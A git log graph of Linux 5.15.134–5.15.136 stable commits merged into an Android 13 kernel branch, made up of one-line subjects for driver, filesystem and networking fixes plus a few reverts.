| * 59ebfeb7b319 tracing: relax trace_event_eval_update() execution with cond_resched()
| * 3d85fb391fa7 ata: libata-eh: Fix compilation warning in ata_eh_link_report()
| * 89e3cc1b0703 ata: libata-core: Fix compilation warning in ata_dev_config_ncq()
| * 137c658ea3ce gpio: timberdale: Fix potential deadlock on &tgpio->lock
| * 68f106c2b2ab overlayfs: set ctime when setting mtime and atime
| * ef3c62e2f0f1 i2c: mux: Avoid potential false error message in i2c_mux_add_adapter
| * e2f64f3eebaa btrfs: initialize start_slot in btrfs_log_prealloc_extents
| * 266dab0ce42d btrfs: return -EUCLEAN for delayed tree ref with a ref count not equals to 1
| * bc424f18fbdc fs-writeback: do not requeue a clean inode having skipped pages
| * 92609823592c ARM: dts: ti: omap: Fix noisy serial with overrun-throttle-ms for mapphone
| * 3898d8d685ab ksmbd: not allow to open file if delelete on close bit is set
| * d3dc26c4fdc2 nfp: flower: avoid rmmod nfp crash issues
| * 6c52b1215904 mctp: perform route lookups under a RCU read-side lock
| * db3f17e571e8 mctp: Allow local delivery to the null EID
| * 29017ab1a539 powerpc/47x: Fix 47x syscall return crash
| * 558ee0fafd40 powerpc/32s: Do kuep_lock() and kuep_unlock() in assembly
| * d00f4ae3accf powerpc/32s: Remove capability to disable KUEP at boottime
| * fcb3f09e8173 drm/atomic-helper: relax unregistered connector check
| * 403d201d1fd1 perf/x86/lbr: Filter vsyscall addresses
| * 419ac18d8808 perf/x86: Move branch classifier
| * 030099bc9115 perf: Add irq and exception return branch types
| * ae80d5290c14 iio: adc: ad7192: Correct reference voltage
| * 569a126f244b iio: cros_ec: fix an use-after-free in cros_ec_sensors_push_data()
| * a9c471892d75 iio: core: introduce iio_device_{claim|release}_buffer_mode() APIs
| * eafbb1966152 iio: core: Hide read accesses to iio_dev->currentmode
| * 919721348c04 iio: Un-inline iio_buffer_enabled()
| * 7f74bc91eb00 serial: 8250_omap: Fix errors with no_console_suspend
| * d67d831e1dbc serial: 8250: omap: Fix imprecise external abort for omap_8250_pm()
| * aff3019b553e selftests/mm: fix awk usage in charge_reserved_hugetlb.sh and hugetlb_reparenting_test.sh that may cause error
| * 4f1d3d1ca500 net: pktgen: Fix interface flags printing
| * 8bdf95e29f86 netfilter: nf_tables: revert do not remove elements if set backend implements .abort
| * cc19daa037f5 netfilter: nf_tables: do not remove elements if set backend implements .abort
| * db33720697c8 netfilter: nft_set_rbtree: .deactivate fails if element has expired
| * 44768cad012c neighbor: tracing: Move pin6 inside CONFIG_IPV6=y section
| * b33179dbf3f2 net/sched: sch_hfsc: upgrade 'rt' to 'sc' when it becomes a inner curve
| * 0426d7bc17b8 bonding: Return pointer to data after pull on skb
| * 66982023d741 net: dsa: bcm_sf2: Fix possible memory leak in bcm_sf2_mdio_register()
| * 0ea476863ef7 i40e: prevent crash on probe if hw registers have invalid values
| * f9202217a6ea net: usb: smsc95xx: Fix an error code in smsc95xx_reset()
| * a2ceb30cc1fc ipv4: fib: annotate races around nh->nh_saddr_genid and nh->nh_saddr
| * a270aa7a47db tun: prevent negative ifindex
| * 9d55719f983d tcp: tsq: relax tcp_small_queue_check() when rtx queue contains a single skb
| * 8ae344291e38 tcp: fix excessive TLP and RACK timeouts from HZ rounding
| * 8b6b4ca42a94 net: rfkill: gpio: prevent value glitch during probe
| * 4df9ba0d7a82 net: ipv6: fix return value check in esp_remove_trailer
| * a9651e66d0bd net: ipv4: fix return value check in esp_remove_trailer
| * 26a3c734cb8a xfrm: interface: use DEV_STATS_INC()
| * f8bc4b708b11 xfrm: fix a data-race in xfrm_gen_index()
| * b660e58ef72d qed: fix LL2 RX buffer allocation
| * d35f398b88a1 ASoC: codecs: wcd938x: fix unbind tear down order
| * d182d8ed7b7e ASoC: codecs: wcd938x: drop bogus bind error handling
| * 8d32a6b67e77 ASoC: codecs: wcd938x-sdw: fix runtime PM imbalance on probe errors
| * 6df571a6c153 ASoC: codecs: wcd938x-sdw: fix use after free on driver unbind
| * 36eabe87031f drm/i915: Retry gtt fault when out of fence registers
| * 34f62612be2a nvmet-tcp: Fix a possible UAF in queue intialization setup
| * 04e0eef74b8f netfilter: nft_payload: fix wrong mac header matching
| * efe43d1bcbcb fs/ntfs3: fix deadlock in mark_as_free_ex
| * ab40c7ab7a93 fs/ntfs3: fix panic about slab-out-of-bounds caused by ntfs_list_ea()
| * 24badb9dd8b8 fs/ntfs3: Fix possible null-pointer dereference in hdr_find_e()
| * ff38d2a705e1 tcp: check mptcp-level constraints for backlog coalescing
| * 582f7993353c x86/sev: Check for user-space IOIO pointing to kernel space
| * 5c2c01be809d x86/sev: Check IOBM for IOIO exceptions from user-space
| * 6797c6d09e50 x86/sev: Disable MMIO emulation from user mode
| * 0b4e772a6a89 KVM: x86: Mask LVTPC when handling a PMI
| * f61c43be1eb9 regmap: fix NULL deref on lookup
| * ffdc881f6807 nfc: nci: fix possible NULL pointer dereference in send_acknowledge()
| * d42aeae14fc4 ice: reset first in crash dump kernels
| * e42cecb513af ice: fix over-shifted variable
| * f6c093b97761 Bluetooth: avoid memcmp() out of bounds warning
| * e5f8b43c9c90 Bluetooth: hci_event: Fix coding style
| * 1597c1ed0e7d Bluetooth: vhci: Fix race when opening vhci device
| * 1ef071526848 Bluetooth: Fix a refcnt underflow problem for hci_conn
| * dd6b62fdd245 Bluetooth: Reject connection with the device which has same BD_ADDR
| * 848a05c4423f Bluetooth: hci_event: Ignore NULL link key
| * e7a2aa7770d3 xfs: don't expose internal symlink metadata buffers to the vfs
| * fe5c6fbc5e4a Documentation: sysctl: align cells in second content column
| * 1815844652cc lib/Kconfig.debug: do not enable DEBUG_PREEMPT by default
* | 558a2461986e Revert "net: add sysctl accept_ra_min_rtr_lft"
* | 042c8b7ec81e Revert "net: change accept_ra_min_rtr_lft to affect all RA lifetimes"
* | 88545dee8c65 Revert "net: release reference to inet6_dev pointer"
* | 987f2b76b345 Revert "scsi: core: Use a structure member to track the SCSI command submitter"
* | 5448f20ac207 Revert "scsi: core: Rename scsi_mq_done() into scsi_done() and export it"
* | aa17a5f040ac Revert "scsi: ib_srp: Call scsi_done() directly"
* | 53a549207220 Revert "RDMA/srp: Do not call scsi_done() from srp_abort()"
* | 90ec7834c858 Revert "net: macsec: indicate next pn update when offloading"
* | 33c153dc1e9e Revert "net: phy: mscc: macsec: reject PN update requests"
* | e472d47b2d7d Merge 5.15.136 into android13-5.15-lts
|\|
| * 00c03985402e Linux 5.15.136
| * 5266b5b6e975 eth: remove remaining copies of the NAPI_POLL_WEIGHT define
| * 528f0ba9f7a4 usb: hub: Guard against accesses to uninitialized BOS descriptors
| * 542a3f1a3cc1 Revert "kernel/sched: Modify initial boot task idle setup"
| * 737ce5518a9c arm64: armv8_deprecated: fix unused-function error
| * 2e10931e2d77 arm64: armv8_deprecated: rework deprected instruction handling
| * abd4aa081905 arm64: armv8_deprecated: move aarch32 helper earlier
| * f10abdb04c3d arm64: armv8_deprecated move emulation functions
| * 0b4eec015fa5 arm64: armv8_deprecated: fold ops into insn_emulation
| * a8d2910be6f8 arm64: rework EL0 MRS emulation
| * 057f9123b1a8 arm64: factor insn read out of call_undef_hook()
| * 3f82927cabaf arm64: factor out EL1 SSBS emulation hook
| * 474385adcd84 arm64: split EL0/EL1 UNDEF handlers
| * de0358635401 arm64: allow kprobes on EL0 handlers
| * 7154e2db8890 arm64: rework BTI exception handling
| * cd5ceadc2b37 arm64: rework FPAC exception handling
| * b6358002fd0c arm64: consistently pass ESR_ELx to die()
| * 7ddb1ef2bb42 arm64: die(): pass 'err' as long
| * 9a3e177ef570 arm64: report EL1 UNDEFs better
| * d6808be3ff94 powerpc/64e: Fix wrong test in __ptep_test_and_clear_young()
| * 9c0dc3e2c996 powerpc/8xx: Fix pte_access_permitted() for PAGE_NONE
| * 4da05eba66e6 dmaengine: mediatek: Fix deadlock caused by synchronize_irq()
| * 82f61b2d5187 dmaengine: idxd: use spin_lock_irqsave before wait_event_lock_irq
| * ecba5afe86f3 x86/alternatives: Disable KASAN in apply_alternatives()
| * cbd2aac00498 usb: cdnsp: Fixes issue with dequeuing not queued requests
| * 7014807fb7ef usb: gadget: ncm: Handle decoding of multiple NTB's in unwrap call
| * 50259cf71a1b usb: gadget: udc-xilinx: replace memcpy with memcpy_toio
| * 308f19249641 counter: microchip-tcb-capture: Fix the use of internal GCLK logic
| * 5a6ce81d7c16 pinctrl: avoid unsafe code pattern in find_pinctrl()
| * 1c790191cab4 cgroup: Remove duplicates in cgroup v1 tasks file
| * 1680c82929bc tee: amdtee: fix use-after-free vulnerability in amdtee_close_session
| * b8ec40a90acd Input: goodix - ensure int GPIO is in input for gpio_count == 1 && gpio_int_idx == 0 case
| * d092630e8a20 Input: i8042 - add Fujitsu Lifebook E5411 to i8042 quirk table
| * 7cea6fa2d73f Input: xpad - add PXN V900 support
| * 6ff4e50e2d2a Input: psmouse - fix fast_reconnect function for PS/2 mode
| * 6a4a39638640 Input: powermate - fix use-after-free in powermate_config_complete
| * 6ad7f52d8c58 ceph: fix type promotion bug on 32bit systems
| * c0c4acd53a98 ceph: fix incorrect revoked caps assert in ceph_fill_file_size()
| * 58f0e6324ec7 libceph: use kernel_connect()
| * d727b97f8f2e thunderbolt: Check that lane 1 is in CL0 before enabling lane bonding
| * 04c38bedd07c thunderbolt: Workaround an IOMMU fault on certain systems with Intel Maple Ridge
| * a586742a3780 mcb: remove is_added flag from mcb_device struct
| * 4382d1a996e5 x86/cpu: Fix AMD erratum #1485 on Zen4-based CPUs
| * 763167003a80 ACPI: resource: Skip IRQ override on ASUS ExpertBook B1402CBA
| * 510d4a01d84c drm/amd/display: Don't set dpms_off for seamless boot
| * 9cb61ab9f4ca drm/amdgpu: add missing NULL check
| * f9a1af37b801 iio: pressure: ms5611: ms5611_prom_is_valid false negative bug
| * 09b8ed9547f1 iio: pressure: dps310: Adjust Timeout Settings
| * 4c80ecef859d iio: pressure: bmp280: Fix NULL pointer exception
| * a625de7e5464 usb: musb: Modify the "HWVers" register address
| * eb28694f6da8 usb: musb: Get the musb_qh poniter after musb_giveback
| * ee88141873a8 usb: cdns3: Modify the return value of cdns_set_active () to void when CONFIG_PM_SLEEP is disabled
| * 3b2dbc4f3302 usb: dwc3: Soft reset phy on probe for host
| * 42c56e015653 net: usb: dm9601: fix uninitialized variable use in dm9601_mdio_read
| * 524f45361789 usb: xhci: xhci-ring: Use sysdev for mapping bounce buffer
| * 1d8e7fe85528 xhci: Keep interrupt disabled in initialization until host is running.
| * cb34e3b25c37 dmaengine: stm32-mdma: abort resume if no ongoing transfer
| * d56dbfe750a8 media: mtk-jpeg: Fix use after free bug due to uncanceled work
| * 5e13e69ddf0d net: release reference to inet6_dev pointer
| * aade10d51ddc net: change accept_ra_min_rtr_lft to affect all RA lifetimes
| * 8f12d2d66cba net: add sysctl accept_ra_min_rtr_lft
| * bc9f6cbeb999 workqueue: Override implicit ordered attribute in workqueue_apply_unbound_cpumask()
| * 25dd54b95abf nfc: nci: assert requested protocol is valid
| * b2bb3b43b94a pinctrl: renesas: rzn1: Enable missing PINMUX
| * c4140dd77c3b net/smc: Fix pos miscalculation in statistics
| * d888d3f70b0d net: nfc: fix races in nfc_llcp_sock_get() and nfc_llcp_sock_get_sn()
| * 249a1fdb95d5 net/mlx5e: Again mutually exclude RX-FCS and RX-port-timestamp
| * 2112cacb38aa ixgbe: fix crash with empty VF macvlan list
| * 935a15334d77 net: phy: mscc: macsec: reject PN update requests
| * 667fe9101a3a net: macsec: indicate next pn update when offloading
| * 2dcb31e65d26 bpf: Fix verifier log for async callback return values
| * 6a217af2c67f drm/vmwgfx: fix typo of sizeof argument
| * 72ef70886556 riscv, bpf: Sign-extend return values
| * 7795592e0818 riscv, bpf: Factor out emit_call for kernel and bpf context
| * 58941cc742ca xen-netback: use default TX queue size for vifs
| * cffdced18af8 eth: remove copies of the NAPI_POLL_WEIGHT define
| * 5c360eec5332 mlxsw: fix mlxsw_sp2_nve_vxlan_learning_set() return type
| * 84c6aa0ae5c4 ieee802154: ca8210: Fix a potential UAF in ca8210_probe
| * 616761cf9df9 ravb: Fix use-after-free issue in ravb_tx_timeout_work()
| * 30ebd4177593 ravb: Fix up dma_free_coherent() call in ravb_remove()
| * 3f39de2bd1d2 drm/msm/dpu: change _dpu_plane_calc_bw() to use u64 to avoid overflow
| * 85ae07d4dcc6 drm/msm/dsi: fix irq_of_parse_and_map() error checking
| * 9a890c7d4d0f drm/msm/dsi: skip the wait for video mode done if not applicable
| * b9de60b6830c drm/msm/dp: do not reinitialize phy unless retry during link training
| * afe5f596b588 KEYS: trusted: Remove redundant static calls usage
| * 20e73ece06b3 KEYS: trusted: allow use of kernel RNG for key material
| * a01d68b6c666 ALSA: usb-audio: Fix microphone sound on Opencomm2 Headset
| * 5b5e58299eac net: prevent address rewrite in kernel_bind()
| * 56e96b38d2f7 quota: Fix slow quotaoff
| * 28ddc1e0b898 HID: logitech-hidpp: Fix kernel crash on receiver USB disconnect
| * b930f0f7bbc2 lib/test_meminit: fix off-by-one error in test_pages()
| * 982bd86fd659 platform/x86: hp-wmi:: Mark driver struct with __refdata to prevent section mismatch warning
| * 124cf0ea4b82 platform/x86: think-lmi: Fix reference leak
| * 3d2a16f878f0 of: overlay: Reorder struct fragment fields kerneldoc
| * 10f4a0b6657e perf/arm-cmn: Fix the unhandled overflow status of counter 4 to 7
| * b7966e2191d0 RDMA/cxgb4: Check skb value for failure to allocate
| * b9bdffb3f9aa RDMA/srp: Do not call scsi_done() from srp_abort()
| * 7d4999589ebc scsi: ib_srp: Call scsi_done() directly
| * d2746cdfd5e5 scsi: core: Rename scsi_mq_done() into scsi_done() and export it
| * 8f2350e204da scsi: core: Use a structure member to track the SCSI command submitter
| * 29298c85a81a iommu/vt-d: Avoid memory allocation in iommu_suspend()
* | 317c6c346ab2 Revert "spi: zynqmp-gqspi: Convert to platform remove callback returning void"
* | 1ce1d976647e Revert "netfilter: handle the connecting collision properly in nf_conntrack_proto_sctp"
* | 39de8e2114ec Merge 5.15.135 into android13-5.15-lts
|\|
| * 02e21884dcf2 Linux 5.15.135
| * c8af81a9d36e xen/events: replace evtchn_rwlock with RCU
| * c346494ec7f1 parisc: Restore __ldcw_align for PA-RISC 2.0 processors
| * 694e13732e83 ksmbd: fix uaf in smb20_oplock_break_ack
| * e914c3a47e45 RDMA/mlx5: Fix NULL string error
| * 81b7bf367eea RDMA/siw: Fix connection failure handling
| * 5d8bd138204f RDMA/uverbs: Fix typo of sizeof argument
| * 60c9ed88526d RDMA/cma: Fix truncation compilation warning in make_cma_ports
| * 7f6136ced1b8 RDMA/cma: Initialize ib_sa_multicast structure to 0 when join
| * 1dd6095fc727 gpio: pxa: disable pinctrl calls for MMP_GPIO
| * 844fcf4c697c gpio: aspeed: fix the GPIO number passed to pinctrl_gpio_set_config()
| * 1878d6666c32 IB/mlx4: Fix the size of a buffer in add_port_entries()
| * 718d9b44afca of: dynamic: Fix potential memory leak in of_changeset_action()
| * e0878f38b661 RDMA/core: Require admin capabilities to set system parameters
| * 18a839064fc6 dm zoned: free dmz->ddev array in dmz_put_zoned_devices
| * 8781fe259dd5 HID: intel-ish-hid: ipc: Disable and reenable ACPI GPE bit
| * 949ccc91c35b HID: sony: remove duplicate NULL check before calling usb_free_urb()
| * a02c02adc2bd sctp: update hb timer immediately after users change hb_interval
| * 7783b471bfce sctp: update transport state when processing a dupcook packet
| * 1abac613c0d5 tcp: fix delayed ACKs for MSS boundary condition
| * 821b3b00bc0f tcp: fix quick-ack counting to count actual ACKs of new data
| * 24fb22bddb71 tipc: fix a potential deadlock on &tx->lock
| * 2e53585e233c net: stmmac: dwmac-stm32: fix resume on STM32 MCU
| * 74e569324050 ipv4: Set offload_failed flag in fibmatch results
| * a4b9bbd1d12f netfilter: nf_tables: nft_set_rbtree: fix spurious insertion failure
| * 88497f74d684 netfilter: handle the connecting collision properly in nf_conntrack_proto_sctp
| * 0c9cf5e8807f ibmveth: Remove condition to recompute TCP header checksum.
| * 5a899e2ce848 net: ethernet: ti: am65-cpsw: Fix error code in am65_cpsw_nuss_init_tx_chns()
| * 4837a192f6d0 net: nfc: llcp: Add lock when modifying device list
| * cda10784a176 net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg
| * 2801a1ddb26d net: dsa: mv88e6xxx: Avoid EEPROM timeout when EEPROM is absent
| * cb145e6c2070 ptp: ocp: Fix error handling in ptp_ocp_device_init
| * cd1189956393 ipv4, ipv6: Fix handling of transhdrlen in __ip{,6}_append_data()
| * 147d89ee4143 net: fix possible store tearing in neigh_periodic_work()
| * bdb4fcf18e16 modpost: add missing else to the "of" check
| * bc8b89b69638 bpf, sockmap: Reject sk_msg egress redirects to non-TCP sockets
| * 9fb4dfb8e212 NFSv4: Fix a nfs4_state_manager() race
| * fcdd79fda38a ima: rework CONFIG_IMA dependency block
| * b67adca1e1be scsi: target: core: Fix deadlock due to recursive locking
| * 9a103e0b100c ima: Finish deprecation of IMA_TRUSTED_KEYRING Kconfig
| * bb6aee0696c6 regmap: rbtree: Fix wrong register marked as in-cache when creating new node
| * 0cee8c1b3af3 wifi: mt76: mt76x02: fix MT76x0 external LNA gain handling
| * 3f6fbbccba2d drivers/net: process the result of hdlc_open() and add call of hdlc_close() in uhdlc_close()
| * ebad2e4c4847 bpf: Fix tr dereferencing
| * 5afb996349cb wifi: mwifiex: Fix oob check condition in mwifiex_process_rx_packet
| * 7c8faa310803 wifi: iwlwifi: mvm: Fix a memory corruption issue
| * 5db7af530ebd iwlwifi: avoid void pointer arithmetic
| * 6ff75f524dae wifi: iwlwifi: dbg_ini: fix structure packing
| * 0ea2a6349733 ubi: Refuse attaching if mtd's erasesize is 0
| * bb0707fde749 HID: sony: Fix a potential memory leak in sony_probe()
| * 8afbacf61919 arm64: Add Cortex-A520 CPU part definition
| * 0da6d21ba235 drm/amd: Fix detection of _PR3 on the PCIe root port
| * 1ad7ccd45a65 net: prevent rewrite of msg_name in sock_sendmsg()
| * 0fb3df94274b net: replace calls to sock->ops->connect() with kernel_connect()
| * 37b54e8acea5 wifi: mwifiex: Fix tlv_buf_left calculation
| * e80f55d6d2a9 qed/red_ll2: Fix undefined behavior bug in struct qed_ll2_info
| * 1e69422efcc6 vringh: don't use vringh_kiov_advance() in vringh_iov_xfer()
| * 4e2f83952b1d scsi: zfcp: Fix a double put in zfcp_port_enqueue()
| * 310bca649b30 Revert "clk: imx: pll14xx: dynamically configure PLL for 393216000/361267200Hz"
| * 3f59e63568ad block: fix use-after-free of q->q_usage_counter
| * b75b017b3f37 rbd: take header_rwsem in rbd_dev_refresh() only when updating
| * 33229d783466 rbd: decouple parent info read-in from updating rbd_dev
| * ab73e7ed79d3 rbd: decouple header read-in from updating rbd_dev->header
| * b4ddad3fb0ea rbd: move rbd_dev_refresh() definition
| * bb1fae816c90 iommu/arm-smmu-v3: Avoid constructing invalid range commands
| * c4edc7b5c836 iommu/arm-smmu-v3: Set TTL invalidation hint better
| * a98ad3adf60d arm64: Avoid repeated AA64MMFR1_EL1 register read on pagefault path
| * aad6ba1715ec ring-buffer: Fix bytes info in per_cpu buffer stats
| * 8012d0b05158 ring-buffer: remove obsolete comment for free_buffer_page()
| * 65a218ca516e NFSv4: Fix a state manager thread deadlock regression
| * 8454a2f5e930 NFS: rename nfs_client_kset to nfs_kset
| * f8b0b6a8e196 NFS: Cleanup unused rpc_clnt variable
| * 686746be7bfb ASoC: tegra: Fix redundant PLLA and PLLA_OUT0 updates
| * 0a210e63844b ASoC: soc-utils: Export snd_soc_dai_is_dummy() symbol
| * b4f7f1556813 spi: zynqmp-gqspi: fix clock imbalance on probe failure
| * e514f897ad66 spi: zynqmp-gqspi: Convert to platform remove callback returning void
* | 65fc22a29c6e Revert "net: bridge: use DEV_STATS_INC()"
* | 2bcfc32534ed Merge 5.15.134 into android13-5.15-lts
|\|
| * 1edcec18cfb7 Linux 5.15.134
| * 09a683023785 netfilter: nf_tables: fix kdoc warnings after gc rework
| * 66cb6d74f5a1 drm/meson: fix memory leak on ->hpd_notify callback
| * 91f1f025b6d9 fs: binfmt_elf_efpic: fix personality for ELF-FDPIC
| * 1cae7473a6dd ata: libata-sata: increase PMP SRST timeout to 10s
| * e74adc589922 ata: libata-core: Do not register PM operations for SAS ports
| * 4cbd55a81965 ata: libata-core: Fix port and device removal
| * ddc525fffb44 ata: libata-core: Fix ata_port_request_pm() locking
| * 2990a195edb5 net: thunderbolt: Fix TCPv6 GSO checksum calculation
| * 132a5ae4136b bpf: Fix BTF_ID symbol generation collision in tools/
| * 58d560e98da5 bpf: Fix BTF_ID symbol generation collision
| * f8673f651bc1 btrfs: properly report 0 avail for very full file systems
| * b5d00cd7db66 ring-buffer: Update "shortest_full" in polling
| * 00d2cb8066cb proc: nommu: /proc/<pid>/maps: release mmap read lock
| * 40527ebb3e45 Revert "SUNRPC dont update timeout value on connection reset"
| * a2b1d486fb70 io_uring/fs: remove sqe->rw_flags checking from LINKAT
| * 111fe77cb13f sched/rt: Fix live lock between select_fallback_rq() and RT push
| * 3569ad59664f kernel/sched: Modify initial boot task idle setup
| * 07f78e97676c i2c: i801: unregister tco_pdev in i801_probe() error path
| * 70df8b9c59bc ata: libata-scsi: ignore reserved bits for REPORT SUPPORTED OPERATION CODES
| * a7e0c10a8c33 ALSA: hda: Disable power save for solving pop issue on Lenovo ThinkCentre M70q
| * 0c5fd85fb01f netfilter: nf_tables: disallow rule removal from chain binding
| * 3936e8714907 nilfs2: fix potential use after free in nilfs_gccache_submit_read_data()
| * 2b837f13a818 serial: 8250_port: Check IRQ data before use
| * a48d2bcd23f2 Revert "tty: n_gsm: fix UAF in gsm_cleanup_mux"
| * 78e70c6238d2 misc: rtsx: Fix some platforms can not boot and move the l1ss judgment to probe
| * f090a8b4d2e3 x86/srso: Add SRSO mitigation for Hygon processors
| * f5a604757aa8 iommu/arm-smmu-v3: Fix soft lockup triggered by arm_smmu_mm_invalidate_range
| * efce75bd2dbc Smack:- Use overlay inode label in smack_inode_copy_up()
| * 0e3450487f99 smack: Retrieve transmuting information in smack_inode_getsecurity()
| * 3586b3feed1b smack: Record transmuting in smk_transmuted
| * 9690ad557d94 nvme-pci: always return an ERR_PTR from nvme_pci_alloc_dev
| * 3c29c6e8cd7c scsi: qla2xxx: Fix NULL pointer dereference in target mode
| * 6e5e4223c897 i40e: fix potential NULL pointer dereferencing of pf->vf i40e_sync_vsi_filters()
| * aff3994d4bdd watchdog: iTCO_wdt: Set NO_REBOOT if the watchdog is not already running
| * 83a30e945571 watchdog: iTCO_wdt: No need to stop the timer in probe
| * 1e8c573f50a7 nvme-pci: do not set the NUMA node of device if it has none
| * 182d13dadb03 nvme-pci: factor out a nvme_pci_alloc_dev helper
| * af58072e867c nvme-pci: factor the iod mempool creation into a helper
| * c8bc44936f2c cgroup: Fix suspicious rcu_dereference_check() usage warning
| * ce6b88a5853d sched/cpuacct: Optimize away RCU read lock
| * b1deb155524e perf build: Define YYNOMEM as YYNOABORT for bison < 3.81
| * 86e65ffc4d0f fbdev/sh7760fb: Depend on FB=y
| * 4bf0044fe43f ncsi: Propagate carrier gain/loss events to the NCSI controller
| * 288990ec3580 powerpc/watchpoints: Annotate atomic context in more places
| * 47a94e87f00c powerpc/watchpoint: Disable pagefaults when getting user instruction
| * 7eb09f70d9c2 powerpc/watchpoints: Disable preemption in thread_change_pc()
| * 134b01a39077 media: vb2: frame_vector.c: replace WARN_ONCE with a comment
| * baf7cf0fdb83 ASoC: imx-rpmsg: Set ignore_pmdown_time for dai_link
| * 9da93c74490c bpf: Clarify error expectations from bpf_clone_redirect
| * e1a8b79ad768 ASoC: fsl: imx-pcm-rpmsg: Add SNDRV_PCM_INFO_BATCH flag
| * 45e028accbdf spi: stm32: add a delay before SPI disable
| * 25850bf83dcd spi: nxp-fspi: reset the FLSHxCR1 registers
| * 50662d21e414 ata: libata-eh: do not clear ATA_PFLAG_EH_PENDING in ata_eh_reset()
| * 8e3cdab909db smb3: correct places where ENOTSUPP is used instead of preferred EOPNOTSUPP
| * d540a4370aba scsi: pm80xx: Avoid leaking tags when processing OPC_INB_SET_CONTROLLER_CONFIG command
| * fde57d7ba9b3 scsi: pm80xx: Use phy-specific SAS address when sending PHY_START command
| * a1589abd7c4a drm/amdgpu: Handle null atom context in VBIOS info ioctl
| * fd334cfd8412 drm/amd/display: Don't check registers, if using AUX BL control
| * a8bc0f6357af platform/mellanox: mlxbf-bootctl: add NET dependency into Kconfig
| * 344f2f3e61a9 ring-buffer: Do not attempt to read past "commit"
| * 3db9b420709b selftests: fix dependency checker script
| * 4aa90e624c30 btrfs: improve error message after failure to add delayed dir index item
| * 53e7c559b7bf ring-buffer: Avoid softlockup in ring_buffer_resize()
| * b4874f72cf57 selftests/ftrace: Correctly enable event in instance-event.tc
| * 8c5c9ecbfa8d scsi: ufs: core: Move __ufshcd_send_uic_cmd() outside host_lock
| * e08e61d50a30 scsi: qedf: Add synchronization between I/O completions and abort
| * ada7fcba2d6a parisc: irq: Make irq_stack_union static to avoid sparse warning
| * b7e376a26b0c parisc: drivers: Fix sparse warning
| * d8c6fad00282 parisc: iosapic.c: Fix sparse warnings
| * 1ecdcfec4e4a parisc: sba: Fix compile warning wrt list of SBA devices
| * bd1ec7f9983b spi: sun6i: fix race between DMA RX transfer completion and RX FIFO drain
| * ff05ed4ae214 spi: sun6i: reduce DMA RX transfer width to single byte
| * ac0d06809934 dma-debug: don't call __dma_entry_alloc_check_leak() under free_entries_lock
| * d938c3d278d5 i2c: npcm7xx: Fix callback completion ordering
| * 0c615323a745 gpio: pmic-eic-sprd: Add can_sleep flag for PMIC EIC chip
| * 2a47ee15a6ab soc: imx8m: Enable OCOTP clock for imx8mm before reading registers
| * 7c59b882b9b3 xtensa: boot/lib: fix function prototypes
| * 70460e81e2d1 xtensa: boot: don't add include-dirs
| * bc51434b6612 xtensa: iss/network: make functions static
| * 8e0f78a84f64 xtensa: add default definition for XCHAL_HAVE_DIV32
| * be57fc50dc3c firmware: imx-dsp: Fix an error handling path in imx_dsp_setup_channels()
| * 1df81ea9e4db power: supply: ucs1002: fix error code in ucs1002_get_property()
| * 6937e44ffb91 bus: ti-sysc: Fix SYSC_QUIRK_SWSUP_SIDLE_ACT handling for uart wake-up
| * 0e75aa86a7d0 ARM: dts: ti: omap: motorola-mapphone: Fix abe_clkctrl warning on boot
| * 1b39eae11752 ARM: dts: ti: omap: Fix bandgap thermal cells addressing for omap3/4
| * fcbf770c66ef ARM: dts: omap: correct indentation
| * f5e12de36ab3 treewide: Replace GPLv2 boilerplate/reference with SPDX - gpl-2.0_56.RULE (part 1)
| * 6829bc7978e0 clk: tegra: fix error return case for recalc_rate
| * 78277b096d4c bus: ti-sysc: Fix missing AM35xx SoC matching
| * 5435a49b3b66 bus: ti-sysc: Use fsleep() instead of usleep_range() in sysc_reset()
| * c39df101d8ca drm/bridge: ti-sn65dsi83: Do not generate HFP/HBP/HSA and EOT packet
| * 4bf10fd51ca5 MIPS: Alchemy: only build mmc support helpers if au1xmmc is enabled
| * d2640d86876e btrfs: reset destination buffer when read_extent_buffer() gets invalid range
| * 1a541999f31f scsi: qla2xxx: Use raw_smp_processor_id() instead of smp_processor_id()
| * 532a23960566 scsi: qla2xxx: Select qpair depending on which CPU post_cmd() gets called
| * 6642b4eb083b ata: ahci: Add Elkhart Lake AHCI controller
| * 072611960741 ata: ahci: Rename board_ahci_mobile
| * 8274154712a0 ata: ahci: Add support for AMD A85 FCH (Hudson D4)
| * bd69c74dca70 ata: libata: Rename link flag ATA_LFLAG_NO_DB_DELAY
| * f5ba6d9d6bec netfilter: nft_exthdr: Fix non-linear header modification
| * 7ca3a1b0f474 netfilter: exthdr: add support for tcp option removal
| * fb6f65780c9c Input: i8042 - add quirk for TUXEDO Gemini 17 Gen1/Clevo PD70PN
| * 191fc23cfa9a Input: i8042 - rename i8042-x86ia64io.h to i8042-acpipnpio.h
| * 5d2b57c0bc40 xfs: fix xfs_inodegc_stop racing with mod_delayed_work
| * 657f842859c4 xfs: disable reaping in fscounters scrub
| * 8444467eadb2 xfs: check that per-cpu inodegc workers actually run on that cpu
| * 67db9ecb84d5 xfs: explicitly specify cpu when forcing inodegc delayed work to run immediately
| * 99e65f075e6c xfs: introduce xfs_inodegc_push()
| * 2df381963240 xfs: bound maximum wait time for inodegc work
| * 08dc21596751 i2c: mux: gpio: Add missing fwnode_handle_put()
| * f912d9d87421 i2c: mux: gpio: Replace custom acpi_get_local_address()
| * 1aa39eee57f6 i2c: mux: demux-pinctrl: check the return value of devm_kstrdup()
| * 9910b1411e7e gpio: tb10x: Fix an error handling path in tb10x_gpio_probe()
| * d7acb7031758 Fix up backport of 136191703038 ("interconnect: Teach lockdep about icc_bw_lock order")
| * d645206e9be2 igc: Expose tx-usecs coalesce setting to user
| * d7a2bf6faa82 bnxt_en: Flush XDP for bnxt_poll_nitroa0()'s NAPI
| * 56d2418a079a net: ena: Flush XDP packets on error.
| * 07b569051f6e locking/seqlock: Do the lockdep annotation before locking in do_write_seqcount_begin_nested()
| * a70dbdede0c7 netfilter: ipset: Fix race between IPSET_CMD_CREATE and IPSET_CMD_SWAP
| * 0dcc9b4097d8 netfilter: nf_tables: disable toggling dormant table state more than once
| * ea82139e6e35 net: rds: Fix possible NULL-pointer dereference
| * cd05eec2ee0c team: fix null-ptr-deref when team device type is changed
| * 8bc97117b51d net: bridge: use DEV_STATS_INC()
| * 0d3939cccb20 net: hns3: add 5ms delay before clear firmware reset irq source
| * d6d182d856d0 net: hns3: fix fail to delete tc flower rules during reset issue
| * 7c47b238f4ec net: hns3: only enable unicast promisc when mac table full
| * 96af9a55b782 net: hns3: fix GRE checksum offload issue
